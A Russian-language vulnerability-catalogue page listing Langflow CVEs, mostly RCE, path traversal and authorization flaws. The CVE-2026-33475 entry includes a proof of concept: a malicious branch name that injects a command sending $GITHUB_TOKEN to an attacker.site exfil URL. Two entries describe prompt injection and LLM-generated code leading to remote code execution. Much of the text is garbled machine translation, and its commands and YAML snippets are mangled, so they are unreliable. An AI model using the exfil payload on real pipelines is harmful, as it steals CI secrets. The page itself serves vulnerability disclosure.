V
Сканер-ВС
ENRU
ГлавнаяКаталогИсточникиCWECAPECATT&CKМеры защитыПродуктыВендорыДокументация
← Вернуться к списку
nvd,anchore_overrides

Langflow

Уязвимости
42
Эксплуатируемые
3
Критический
15
Высокий
17

Топ продуктов

Langflow35Langflow Desktop7Langflow-base1

Топ уязвимостей

CVE-2026-33309Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. Версии 1.2.0 - 1.8.1 имеют обход пласта для CVE-2025-68478 (Внешний контроль имени файла), что приводит к исходной архитектурной проблеме в «LocalStorageService» неразрешенным. Поскольку базовый уровень хранения не имеет пограничного контроля, система полностью зависит от HTTP-слоя «ValidatedFileName` зависимо». Этот провал защитного глубины делает конечную точку «POST /api/v2/files/`» уязвимой для записи произвольных файлов. Многочастное имя файла обходит гаектор дорожный параметр, позволяя аутентифицированным злоумышленникам писать файлы в любом месте в системе хоста, что приводит к удаленному исполнению кода (RCE). Версия 1.9.0 содержит обновленное исправление.
CVE-2026-7524IBM Langflow OSS 1.0.0 до 1.9.1 может обеспечить удаленное выполнение кода из-за неправильной проверки символических ссылок во время извлечения архива.
CVE-2026-27966Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До версии 1.8.0, узл агента CSV в Langflow хот-кодирует `low_dangerous_code=True`, который автоматически обнажает инструмент Python REPL (`python_repl_ast``). В результате злоумышленник может выполнять произвольные команды Python и OS на сервере с помощью быстрого впрыска, что приводит к полному исполнению удаленного кода (RCE). Версия 1.8.0 решает проблему.
CVE-2026-0770Langflow exec_globals Включение функциональности из ненадежной области управления Удаленность Исполнительного Исполнения. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольный код на затронутых установках Langflow. Аутентификация не требуется для использования этой уязвимости. Устный недостаток существует в обработке параметра exec_globals, предоставляемого к конечной точке подтверждения. Проблема возникает в результате включения ресурса из ненадежной контрольной сферы. Злоумышленник может использовать эту уязвимость для выполнения кода в контексте корня. Это был ZDI-CAN-27325.
CVE-2026-0769Langflow eval_custom_comonent_code Eval Injection Уязвимость Исполнительного Исполнения. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольный код на затронутых установках Langflow. Аутентификация не требуется для использования этой уязвимости. Удельный недостаток существует в рамках реализации функции eval_custom_component_code. Проблема возникает из-за отсутствия надлежащей проверки пользовательской строки перед ее использованием для выполнения кода python. Злоумышленник может использовать эту уязвимость для выполнения кода в контексте текущего процесса. Это был ZDI-CAN-26972.
CVE-2026-0768Код Langflow Код Инъекции Удаленное Исполнение Кода Уязвимость. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольный код на затронутых установках Langflow. Аутентификация не требуется для использования этой уязвимости. Конкретный недостаток существует в обработке параметра кода, предоставляемого к установленной конечной точке. Проблема возникает из-за отсутствия надлежащей проверки пользовательской строки перед ее использованием для выполнения кода Python. Злоумышленник может использовать эту уязвимость для выполнения кода в контексте корня. . Это Был ZDI-CAN-27322.
CVE-2025-3248Уязвимость Langflow версий до 1.3.0 позволяет выполнить инъекцию кода на эндпоинте /api/v1/validate/code. Удалённый неаутентифицированный злоумышленник может отправить специально сформированные HTTP-запросы для выполнения произвольного кода [1]. Эта уязвимость легко эксплуатируется и позволяет полностью скомпрометировать серверы Langflow. Проблема исправлена в Langflow 1.3.0, и всем пользователям рекомендуется обновиться до последней версии. Уязвимый эндпоинт был защищён аутентификацией в версии 1.3.0 [2]. Источники: - [1] https://github.com/langflow-ai/langflow/pull/6911 - [2] https://github.com/langflow-ai/langflow/releases/tag/1.3.0 - [3] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
CVE-2024-48061langflow <=1.0.18 уязвим для удаленного выполнения кода (RCE), поскольку любой компонент предоставляет функциональность кода, и компоненты работают на локальной машине, а не в песочнице.
CVE-2024-42835В langflow v1.0.12 обнаружена уязвимость удаленного выполнения кода (RCE) через компонент PythonCodeTool.
CVE-2024-37014Langflow до версии 0.6.19 позволяет удаленное выполнение кода, если ненадежные пользователи могут получить доступ к конечной точке "POST /api/v1/custom_component" и предоставить скрипт Python.
CVE-2026-42048Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До 1.9.0 Langflow уязвим для Path Traversal в API Баз знаний (DELETE /api/v1/knowledge_bases). Это происходит потому, что пользовательские имена баз знаний сводятся непосредственно к путям файлов без надлежащей санации или проверки границ. Аутентифицированный злоумышленник может использовать этот недостаток для удаления произвольных каталогов в любом месте файловой системы сервера, что приводит к потере данных и потенциальной сбою работы. Эта уязвимость зафиксирована в разделе 1.9.0.
CVE-2025-34291Версии Langflow до 1.6.9 включительно содержат цепную уязвимость, которая позволяет захватить учетную запись и удаленное выполнение кода. Чрезмерно разрешительная конфигурация CORS (allow_origins='*' с allow_credentials=True) в сочетании с файлом cookie обновления токена, настроенным как SameSite =None, позволяет вредоносной веб-странице выполнять перекрестные запросы, которые включают учетные данные, и успешно вызывать конечную точку обновления. Таким образом, контролируемое злоумышленником происхождение может получить свежие пары access_token / освеженный_ток для сеанса жертвы. Полученные токены позволяют получить доступ к аутентифицированным конечным точкам, включая встроенную функциональность исполнения кода, что позволяет злоумышленнику выполнять произвольный код и достигать полного компрометирования системы.
CVE-2026-33873Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До версии 1.9.0 функция Agentic Assistant в Langflow выполняет код Python, сгенерированный LLM, на этапе проверки. Хотя этот этап, по-видимому, предназначен для проверки сгенерированного кода компонента, реализация достигает динамических поглотителей исполнения и инстанциативирует сгенерированный серверный сервер класса. В развертываниях, где злоумышленник может получить доступ к функции Agentic Assistant и повлиять на вывод модели, это может привести к произвольному выполнению Python на стороне сервера. Версия 1.9.0 исправляет проблему.
CVE-2026-33017Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. В версиях до 1.9.0 POST /api/v1/build_public_tmp/{flow_id}/flow конечную точку позволяет создавать общественные потоки без необходимости аутентификации. При поставке опционального параметра данных конечную точку используются данные потока, управляемые злоумышленником (содержащие произвольный код Python в определениях узла), вместо данных потока из базы данных. Этот код передается exec() с нулевым песочием, что приводит к неаутентифицированному удаленному исполнению кода. Это отличается от CVE-2025-3248, который фиксирует /api/v1/validate/code путем добавления аутентификации. endpoint build_public_tmp предназначена для неаутентификации (для общественных потоков), но неправильно принимает данные потока, поставляемые злоумышленником, содержащие произвольный исполняемый код. Эта проблема исправлена в версии 1.9.0.
CVE-2026-33475Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. Неаутентированная уязвимость удаленного впрыска оболочки существует в нескольких рабочих процессах GitHub Actions в репозитории Langflow до версии 1.9.0. Несанитарная интерполяция контекстных переменных (например, `${{{ github.head_ref }}`) в шагах `run:` позволяет злоумышленникам вводить и выполнять произвольные команды оболочки через вредоносное имя ветви или заголовок запроса. Это может привести к тайной эксфильтрации (например, `GITHUB_TOKEN`), манипулированию инфраструктурой или компромиссу цепочки поставок во время выполнения CI/CD. Версия 1.9.0 исправляет уязвимость. --- ## Детали Несколько рабочих процессов в `.github/workflows/`` и `.github/actions/` ссылка на контекстные переменные GitHub непосредственно в "run:` командах оболочки, как: ``yaml ``` проголодаться: | validate_branch_name "${{{ github.event.pull_request.head.ref }}" ``` Или: ``yaml ``` run: npx драматург установить ${{ входы.бровсеры }} --with-deps ``` Поскольку `github.head_ref`, `github.event.pull_request.title`` и пользовательские `inputs.*` могут содержать **управляемые ** ценности**, они должны рассматриваться как ****ненадежные вклады**. Прямая интерполяция без правильного цитирования или санации приводит к инъекции команды снаряда. --- ## # PoC 1. **Вилки** хранилище Langflow 2. 2. **Создать новую ветку** с именем: ``bash инъекционный тест && завиток https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. 3. **Откройте запрос на вытягивание** к основному филиалу из новой ветки 4. 4. GitHub Actions будет запускать затронутый рабочий процесс (например, "deploy-docs-draft.yml`) 5. `run:` шаг, содержащий: ``yaml ``` Эхо "ВеСТрь: ${{ github.head_ref }}" ``` Будет исполнять: ``bash Эхо "Ветвь: инъекционный тест" завиток https://atttacker.site/exfil?token=$GITHUB_TOKEN ``` 6. 6. Злоумышленник получает секрет CI через URL-адрес exfil. --- ## Impact - **Type:** Впрыскивание оболочки / Удаленное исполнение кода в CI - **Scope:** Любая публичная вилка Langflow с включенными действиями GitHub - **Импакт:** Полный доступ к секретам CI (например, `GITHUB_TOKEN`), возможность нажимать вредоносные теги или изображения, вмешиваться в выпуски или утечку конфиденциальных данных инфраструктуры --- ### Рекомактирование Рефактор затронул рабочие процессы для использования переменных среды** и заверните их в **double quotes**: ``yaml ``` Энв: ФИО_ИМЯ: ${{ github.head_ref }} проголодаться: | Эхо "Ветвь: \"$BRANCH_NAME\"" ``` Избегайте прямого `${{ ... }}` интерполяция внутри `run:` для любого значения, контролируемого пользователем. --- ## Затронутые Файлы (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - ".github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
CVE-2026-6543IBM Langflow Desktop 1.0.0 до 1.8.4 Langflow позволяет злоумышленнику выполнять произвольные команды с привилегиями процесса, запускающего Langflow. Это позволяет считывать чувствительные переменные среды (ключи AP, учетные данные DB), изменять файлы или проводить дальнейшие атаки на внутреннюю сеть.
CVE-2026-5027Конечная точка «POST /api/v2/files» не дезинфицирует параметр «файлим» из многочастных форм данных, позволяя злоумышленнику записывать файлы в произвольные местоположения в файловой системе, используя последовательности прохождения пути (../).
CVE-2026-3357IBM Langflow Desktop 1.6.0 до 1.8.2 Langflow может позволить аутентифицированному пользователю выполнять произвольный код в системе, вызванный небезопасной настройкой по умолчанию, которая позволяет дезериализовать ненадеженные данные в компоненте FAISS.
CVE-2026-21445Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До версии 1.7.0.dev45 несколько критических конечных точек API в Langflow отсутствуют элементы управления аутентификацией. Проблема позволяет любому пользователю без аутентификации получать доступ к конфиденциальным данным о разговорах пользователей, историям транзакций и выполнять разрушительные операции, включая удаление сообщений. Это влияет на конечные точки, обрабатывающие персональные данные, и системные операции, которые должны требовать надлежащего разрешения. Версия 1.7.0.dev45 содержит патч.
CVE-2025-57760В Langflow обнаружена уязвимость повышения привилегий, позволяющая аутентифицированному пользователю с доступом к RCE выполнить команду langflow superuser для создания нового административного пользователя. Это приводит к получению полных прав суперпользователя. Рекомендуется использовать параметр LANGFLOW_ENABLE_SUPERUSER_CLI, чтобы отключить создание суперпользователя через CLI. Источники: - [1] https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r - [2] https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97 - [3] http://github.com/langflow-ai/langflow/pull/9152 Источники: - [1] https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r - [2] https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97 - [3] http://github.com/langflow-ai/langflow/pull/9152
CVE-2024-7297Версии Langflow до 1.0.13 подвержены уязвимости повышения привилегий, позволяющей удаленному злоумышленнику с низкими привилегиями получить права суперадминистратора, выполнив запрос массового назначения в конечной точке '/api/v1/users'.
CVE-2026-34046Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До версии 1.5.1 помощник `_read_flow` в `src/backend/base/langflow/api/v1/flows.py` разветвлялся на настройке `UTO_LOGIN`, чтобы решить, фильтровать ли по `user_id`. Когда `UTO_LOGIN` был «False` (т.е. была включена аутентификация), ни одна из филиалов не применяла проверку собственности — запрос возвращал любой поток, соответствующий заданному UUID, независимо от того, кто его владел. Это позволило любому аутентифицированному пользователю прочитать поток любого другого пользователя, включая встроенные ключи API-клиентов открытого текста; изменить логику агентов ИИ другого пользователя и/или удалить потоки, принадлежащие другим пользователям. Уязвимость была введена условной логикой, которая была предназначена для размещения общественных/примерных потоков (с `user_id = NULL`) в режиме автоматического входа, но непреднамеренно оставила аутентифицированный путь без фильтра собственности. Исправление в версии 1.5.1 удаляет условный `UTO_LOGIN` условный и безоговорочно охватывает запрос запрашивающего пользователя.
CVE-2026-33497Langflow - это инструмент для создания и развертывания агентов и рабочих процессов на основе ИИ. До версии 1.7.1, в функции скачать_profile_picture of the /profile_pictures/{folder_name}, параметры folder_name и file_name не фильтруются строго, что позволяет читать секретно-key через каталоги. Версия 1.7.1 содержит патч.
CVE-2026-7787IBM Langflow OSS 1.0.0 - 1.9.1 может позволить аутентифицированному пользователю считывать или изменять конфиденциальную информацию, минуя аутентификацию с использованием небезопасных прямых ссылок на объект.
CVE-2026-6542IBM Langflow OSS 1.0.0-1.8.4 может позволить любому пользователю поставлять flow_id для чтения журналов транзакций и данных по сборке вверх, принадлежащих другим пользователям, и удалять удержанные данные по сборке вершин для потока другого пользователя.
Открыть в каталоге с фильтром по вендору →